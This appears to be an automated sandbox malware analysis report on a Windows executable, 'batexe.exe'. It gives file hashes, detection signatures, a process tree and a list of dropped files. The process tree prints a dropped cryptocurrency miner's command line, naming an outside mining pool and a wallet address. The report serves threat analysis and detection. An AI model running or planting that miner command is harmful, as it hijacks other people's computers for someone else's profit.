73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
303s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 13:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1460	b2e.exe
4236	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4236	cpuminer-sse2.exe
4236	cpuminer-sse2.exe
4236	cpuminer-sse2.exe
4236	cpuminer-sse2.exe
4236	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/220-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 1460	220	batexe.exe	75
PID 220 wrote to memory of 1460	220	batexe.exe	75
PID 220 wrote to memory of 1460	220	batexe.exe	75
PID 1460 wrote to memory of 1000	1460	b2e.exe	76
PID 1460 wrote to memory of 1000	1460	b2e.exe	76
PID 1460 wrote to memory of 1000	1460	b2e.exe	76
PID 1000 wrote to memory of 4236	1000	cmd.exe	79
PID 1000 wrote to memory of 4236	1000	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:220
- C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9F4D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\b2e.exe

Filesize
4.3MB

MD5
225ad63ae4285536842ee1ca4b56e051

SHA1
73d1fcf4006c841ffcfa1269566d8543a5aaf7d2

SHA256
23c4e0cec42cfccabe7c01b688e5d50a0d271897860bb8b395ca6e8e6e6fbc13

SHA512
2dbceb2eab4bb328a2f5569013574eb7bb07f0c3539cab08a00e383124a4d08bf414739cc50380b10c8a1079cabc410323d4b1fbe99e61361d3a52372c46d88b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\b2e.exe

Filesize
4.3MB

MD5
ace953ba5dc0de7105146837f27e312a

SHA1
6b30907ffdc833089c7f2c17aa4491813a7d6ebf

SHA256
fae8ac3c85e9e32a8e8769df8b610b325c5de01357ada96111e202f348c104c7

SHA512
39ceb68af4a55abcf564a82a735386833ec04b0745461b6a39b7632182f30757f16704b9e083c86421852cb61dbc92d3dac211a4d790d66fb2ae7528866ba389

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F4D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
fc130c5af6812caa3fb9c37169a7886a

SHA1
b22e9aee63c4f70b09f439b652734c4027344f45

SHA256
bf324845361c6004eecfb0fe6f46c71dd58c7bc6cf2f17e0536bdb84269825f2

SHA512
4fccd8b44a4920bd8ce2a879dff97d497223c146d02682fba37c95aa3617de156b4eb492b3d9e7c28898922bb0e443c5a633b77b1cc607f99d54e4b8884bf70c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
683KB

MD5
15c54314623259a1d0099507eae999d0

SHA1
3aec57af9f82f2326f4eb27e14f81c1574ef46d3

SHA256
8cb026012d23b7b910020d9e172644f0b36e3bac0e76fa02beaaa93460661587

SHA512
a015086ba3fef5d30c7d3377c208fb392cf6fdde1635a3b2f5bc2a8c8eda433a43bc22b6ddc29e78aef5c9f32d35c9fc858cfc2733e19f7dc52ada79d198e7ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
799d3c24a4a181fef5c81ff448d54ca8

SHA1
4d78bf61e271fee37f496e5b27d98b4003d6f7f1

SHA256
49087555ba33ec28799185c3af8f2fe87c0519ce6b74fbfcd6fee01360cf6d73

SHA512
422485b12dcd6d9cab0fb589f013f98c5b144de14b6e07af756cb0d6970be8b090e44dd143cf0a3d09e50d4f06d9c68a39a1f3c5241b624446fe1e2ee181cae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.5MB

MD5
b574302e32a71e726ecfab73c2bef6be

SHA1
3ad4e10fa8c6eeb5320baf379b15c55ef4e478de

SHA256
000158b65072b50f4afd31f9aa9f0d4c4ea5dfe8e004bdebe26997181822c816

SHA512
156fa45328d7091ca2338e4b5f8540afb42cf862003df7643548b135f994ec7c916f6edb25147cd206cf2c9873a0523f7ccae44e1801a1d6deb0fc79c120350f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
8ef47139feced2c5da92acff576dd698

SHA1
b140fdf94321483503ed45f459f578276e934c60

SHA256
c8edfca0622e2b70514b74c5b9b554950c0392246bccec1daed3e5c5cc489a38

SHA512
c8048d536ab54fa42464b8986d931fa5ec2350579e2da3938c468a85e565b69f8572143de591cd6aec522d2567c3c9dd509144438aa16a1583b580d7f0343f70

Download Submit
memory/220-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1460-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1460-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4236-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4236-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-43-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/4236-44-0x0000000000F30000-0x00000000027E5000-memory.dmp

Filesize
24.7MB

Download
memory/4236-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4236-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download